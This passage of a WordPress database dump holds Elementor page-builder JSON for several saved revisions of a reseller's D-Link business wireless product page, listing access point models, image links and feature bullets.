and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a58efa2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"65475d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239e245\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"942c9fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3508,2638,'_elementor_version','0.4'),(3511,2639,'_wp_page_template','template-fullwidth.php'),(3512,2639,'_elementor_edit_mode','builder'),(3513,2639,'_elementor_template_type','post'),(3514,2639,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a58efa2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"65475d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239e245\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"942c9fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3515,2639,'_elementor_version','0.4'),(3518,2640,'_wp_page_template','template-fullwidth.php'),(3519,2640,'_elementor_edit_mode','builder'),(3520,2640,'_elementor_template_type','post'),(3521,2640,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a58efa2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"65475d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239e245\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"942c9fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3522,2640,'_elementor_version','0.4'),(3552,2650,'_wp_page_template','template-fullwidth.php'),(3553,2650,'_elementor_edit_mode','builder'),(3554,2650,'_elementor_template_type','post'),(3555,2650,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central 